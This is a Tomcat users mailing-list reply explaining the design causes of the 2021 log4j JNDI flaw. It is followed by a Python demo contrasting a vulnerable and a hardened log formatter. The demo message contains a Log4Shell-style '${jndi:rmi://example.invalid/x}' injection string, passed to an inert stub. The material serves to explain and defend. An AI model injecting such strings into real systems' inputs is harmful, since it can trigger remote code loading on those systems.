James,

On 12/13/21 19:24, James H. H. Lampert wrote:
> I can *barely* wrap my mind around the idea of getting executable code from an RMI server, but what legitimate purpose could be served by allowing a *logger* to resolve executable code?

None. The designers of log4j probably were thinking "hey, users might want to log their configuration(s) to the log file at some point, so maybe we can do them a favor and make it really easy to do that using ${jndi:} directly in the log message." Never, of course, thinking about the fact that JNDI lookups can be *far* more ... interesting than just grabbing a string value from memory and tossing it into a log message.

This vulnerability comes from two sources:

1. An incredibly powerful and complex infrastructure in JNDI

+

2. An incredibly simple way to access it (via log4j)

At the time, nobody was thinking critically about security because "it's just logging stuff."

-chris
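As an added illustration of the design point Chris makes (not code from this thread, and not log4j's own code): a toy Python formatter that expands `${prefix:key}` lookups, shown first in the convenient form where the log message is spliced into the pattern before expansion, so lookups written into the message text are resolved, and then in a hardened form where only the operator-controlled pattern is expanded and the message is inserted afterwards as opaque data. The resolver table, the `jndi` stub (which records the key it was handed and performs no lookup of any kind) and the sample message are constructed for the demo.

```python
import re

# Toy model of a log4j-style message formatter, constructed for illustration.
# A lookup has the form "${prefix:key}"; a resolver maps a prefix to a function of key.
LOOKUP = re.compile(r"\$\{([a-zA-Z]+):([^}]*)\}")

def make_resolvers(trace):
    """Constructed resolver table. The 'jndi' entry performs no lookup at all:
    it only records the key it was handed, so the demo shows whether text from
    the log *message* can reach a resolver."""
    return {
        "env": lambda key: {"APP_NAME": "demo"}.get(key, ""),   # constructed environment
        "jndi": lambda key: trace.append(key) or "<jndi-lookup>",
    }

def expand(text, resolvers):
    """Replace every ${prefix:key} whose prefix has a resolver with its result."""
    def sub(match):
        prefix, key = match.group(1), match.group(2)
        resolver = resolvers.get(prefix)
        return resolver(key) if resolver else match.group(0)
    return LOOKUP.sub(sub, text)

def format_vulnerable(pattern, message, resolvers):
    """The convenient design: splice the message into the pattern first, then
    expand lookups over the whole string. Lookups written by whoever produced
    the message text are resolved too."""
    return expand(pattern.replace("%m", message), resolvers)

def format_hardened(pattern, message, resolvers):
    """Expand lookups only in the operator-controlled pattern, then insert the
    message afterwards as opaque data. Nothing in the message is resolved."""
    return expand(pattern, resolvers).replace("%m", message)

def demo(message, pattern="[${env:APP_NAME}] %m"):
    """Format one message both ways; return (vulnerable output, number of jndi
    keys that reached the resolver, hardened output, same count)."""
    trace = []
    resolvers = make_resolvers(trace)
    vulnerable = format_vulnerable(pattern, message, resolvers)
    hits_vulnerable = len(trace)
    trace.clear()
    hardened = format_hardened(pattern, message, resolvers)
    return vulnerable, hits_vulnerable, hardened, len(trace)

if __name__ == "__main__":
    # Constructed message: text a user typed (say, a username field) ends up in the log line.
    print(demo("login failed for user ${jndi:rmi://example.invalid/x}"))
```

With the vulnerable formatter the `jndi` resolver is reached once by text that came from the message; with the hardened one it is never reached and the `${jndi:...}` text is simply logged verbatim.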

---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org